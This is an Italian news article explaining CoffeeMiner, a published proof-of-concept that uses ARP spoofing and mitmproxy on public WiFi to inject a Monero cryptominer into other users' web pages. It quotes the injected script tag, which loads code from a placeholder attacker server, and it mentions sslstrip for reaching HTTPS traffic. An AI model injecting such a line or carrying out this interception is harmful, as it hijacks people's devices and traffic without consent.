Torna alla home
Torna alla home
.....
Open menu
Home
 
Search
 
MY
Articoli Salvati
 
Life
Smart Money
The Food Makers
Valore Responsabile
 
That's Round
Cover Story
 
Economy
Education
Impact
Lifestyle
Startup
Tech
 
Agenda
Bandi
Live TV
 
Unstoppable Women
Bandi Istruzioni per l'uso
Imprenditori Sostenibili
Investimenti Digitali E Cripto
 
SIOS
Shopping
 
STARTUPITALIA
Advisory Board
Area Investor
Lavora con noi
Chi siamo
I nostri autori
desc
TECH

CoffeeMiner: come hackerare le reti WiFi per produrre criptovalute

 ⏱ Leggi in 2 min
  ⏱2 min read
TECH
Share article
Set prefered

CoffeeMiner: come hackerare le reti WiFi per produrre criptovalute

Share article
Set prefered

Uno sviluppatore ha pubblicato un progetto denominato CoffeeMiner che dimostra come sia possibile hackerare una rete WiFi pubblica per iniettare codice per il mining di criptovalute all’interno delle sessioni degli utenti connessi

Uno sviluppatore ha pubblicato un progetto denominato CoffeeMiner che dimostra come sia possibile hackerare una rete WiFi pubblica per iniettare codice per il mining di criptovalute all’interno delle sessioni degli utenti connessi

Cybersecurity
author avatar
Pierluigi Paganini
8 gen 2018

Molti di voi avranno osservato l’inesorabile ascesa delle principali criptovalute, il Bitcoin su tutte. Questa impennata dei prezzi sta aumentando l’interesse dell’ecosistema criminale.
Aumentano i casi in cui criminali informatici sviluppano codici malevoli per rubare wallet contenenti criptovalute oppure hackerano siti web per installarvi script in grado di produrre monete virtuali (“mining”) sfruttando le risorse computazionali degli ignari visitatori.

Il progetto CoffeeMiner

Uno sviluppatore di nome Arnau ha pubblicato un interessante progetto denominato CoffeeMiner che dimostra come sia possibile hackerare una rete WiFi pubblica per iniettare codice per il mining di criptovalute all’interno delle sessioni degli utenti connessi. In questo modo un attaccante potrebbe sfruttare le risorse computazionali degli utenti connessi alla rete WiFi per produrre criptovalute.

L’idea del progetto è stata ispirata dal recente caso Starbucks in cui hacker hanno dirottato le connessioni dei laptop collegati alla rete WiFi per sfruttare la potenza di calcolo delle macchine in attività di mining.
Arnau ha spiegato come condurre una MITM (Man-In-The-Middle) per iniettare del codice javascript nelle pagine html richieste dagli utenti connessi alla rete WiFi, in questo modo tutti i dispositivi connessi ad una rete WiFi sono forzati ad effettuare calcoli per la produzione di criptovalute.
Il CoffeeMiner sfrutta la capacità di creare falsi pacchetti ARP (Address Resolution Protocol) su una rete locale per intercettare il traffico non criptato da altri dispositivi sulla rete.

Le modalità dell’attacco

L’attacco MiTM viene condotto utilizzando un software chiamato mitmproxy che consente di iniettare la seguente riga di codice HTML all’interno del traffico non crittografato relativo alle richieste effettuate dagli altri utenti connessi alla rete WI-FI:

<script src = “http: // httpserverIP: 8000 / script.js” type = “text / javascript”> </ script>

 

“Mitmproxy è uno strumento software che ci consente di analizzare il traffico che attraversa un host e di modificare quel traffico. Nel nostro caso, lo useremo per iniettare il javascript nelle pagine html “, ha scritto Arnau.

“Per rendere il processo più pulito, inseriremo solo una riga di codice nelle pagine html . E sarà quella linea di codice html che invocherà il minatore di criptovaluta javascript.”

 

Quando il browser dell’utente connesso alla rete WiFi carica una pagina, esegue anche il codice JavaScript iniettato che carica lo script minatore CoinHive per la generazione di criptovaluta Monero.

Arnau ha configurato una macchina VirtualBox per dimostrare l’attacco ed ha pubblicato un paio di video che dimostrano l’attacco rispettivamente in un ambiente virtualizzato ed in una rete reale.

 

 

La versione del progetto CoffeeMiner pubblicata dallo sviluppatore non funziona nel caso di connessioni HTTPS, ma la limitazione potrebbe essere facilmente aggirata con l’aggiunta di sslstrip che consente di forzare s’utilizzo del protocollo http su connessioni HTTPs.

 

 

“Un’altra caratteristica aggiuntiva potrebbe essere l’aggiunta di sslstrip , per garantire l’iniezione anche nei siti Web cui l’utente si connette tramite HTTPS.” Conclude lo sviluppatore. Per i più curiosi tra voi, Arnau ha pubblicato il codice del progetto CoffeeMiner su GitHub .

 

Tags: #COFFEEMINER #CYBERSECURITY #WIFI
Iscriviti alla newsletter di SI

Info, networking, best practice sull'innovazione digitale in Italia.

Home
Il magazine dell'innovazione e delle startup italiane
facebook
twitter
instagram
linkedin

 

LifeValore ResponsabileSmart MoneyThe food makers

 

TechEconomyEducationLifestyleStartupImpact

StartupItalia

Advisory BoardArea InvestorSIOSShoppingAgendaBandiLavora con noi
loading autori
StartupItalia! è una testata registrata presso il tribunale di Roma n. 167/2012
StartupItalia! SRL, Cagliari, Via Sassari 3, 09123, PIVA 13733231008, REA - CA - 352408, Capitale Sociale: € 28.924,60, PEC startupitalia (at) legalmail.it
Privacy 
|
 Cookie 
|
 Change privacy settings
Torna alla home
Life
Smart Money
The food makers
Valore Responsabile
That's Round
Cover Story
Economy
Education
Impact
Lifestyle
Startup
Tech
Agenda
Bandi
LIVE TV
SIOS
Shopping
RUBRICHE
Unstoppable Women
Bandi Istruzioni per l'uso
Imprenditori Sostenibili
Investimenti Digitali E Cripto
MY
Articoli Salvati
STARTUPITALIA
Advisory Board
Area Investor
Lavora con noi
Chi siamo